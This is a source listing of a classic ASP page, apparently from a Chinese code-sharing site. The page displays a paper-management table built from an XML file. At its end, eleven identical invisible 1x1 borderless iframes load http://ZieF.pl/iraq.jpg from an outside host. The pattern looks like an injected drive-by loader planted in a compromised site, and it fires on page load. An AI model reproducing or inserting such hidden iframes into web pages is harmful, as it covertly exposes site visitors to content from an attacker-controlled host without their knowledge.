📄 gblist.asp
字号:
<!--File Name:GBManage.asp -->
<%@ language="VBScript" %>
<html>
<head>
<title>论文管理</title>
<style type="text/css">
<!--
#Layer1 {
position:absolute;
left:157px;
top:135px;
width:681px;
height:23px;
z-index:1;
}
.STYLE4 {font-size: 14px; font-weight: bold; color: #999900; }
body {
background-repeat: no-repeat;
background-image: url(img/GB.jpg);
}
body,td,th {
font-size: 14px;
}
a:link {
text-decoration: none;
}
a:visited {
text-decoration: none;
}
a:hover {
text-decoration: none;
}
a:active {
text-decoration: none;
}
-->
</style>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
<body>
<div id="Layer1"><span class="STYLE4"> 现在是:<%=now()%><a href="GBList.asp"></a></span><a href="GBAppend.htm" class="STYLE4"> [添加论文]</a><span class="STYLE1"><a href="GBManage.asp" class="STYLE4">[删除论文]</a></span><span class="STYLE1"><a href="select1.asp" class="STYLE4">[作者查询]</a></span><span class="STYLE4"><a href="select2.asp">[标题查询]</a></span><a href="select3.asp"><span class="STYLE4">[关键字查询]</span> </a></div>
<table width="950" border="0" cellpadding="0" cellspacing="0">
<!--DWLayoutTable-->
<tr>
<td width="119" height="182"> </td>
<td width="710"> </td>
<td width="121"> </td>
</tr>
<tr>
<td height="180"> </td>
<td valign="top"><table border="0" align="center" cellpadding="5">
<thead>
<th>主题</th>
<th>作者</th>
<th>刊名</th>
</thead>
<%'创建用来访问XML文档的DOM对象:
set xmldoc=server.createObject("MSXML.DOMDocument")
xmldoc.async="false"
xmldoc.load(server.mappath("lw.xml"))
set nodes=xmldoc.getElementsByTagName("lw")
k=1
for i=0 to nodes.length-1 step +1
if k mod 2=0 then
row="<tr bgcolor=#E1D596>"
else
row="<tr bgcolor=#E6D4C6>"
end if
str1=nodes(i).childNodes(0).text
for j=0 to nodes(i).childNodes.length -1
if nodes(i).childNodes(j).nodeName = "author" then
str2=str2+ nodes(i).childNodes(j).text+" "
end if
if nodes(i).childNodes(j).nodeName = "kanming" then
str4=str4+ nodes(i).childNodes(j).text+" "
end if
next
row=row&"<td><a href='GBView.asp?id="&i&"'>"
row=row&str1&"</a></td>"
row=row&"<td>"&str2&"</td>"
row=row&"<td>"&str4&"</td>"
response.write row&"</tr>"
k=k+1
str2=""
str4=""
next
set xmldoc=nothing
%>
<div id=REDIV></div>
<div id=REDIV1></div>
</center>
</table> </td>
<td> </td>
</tr>
<tr>
<td height="279"> </td>
<td> </td>
<td> </td>
</tr>
</table>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -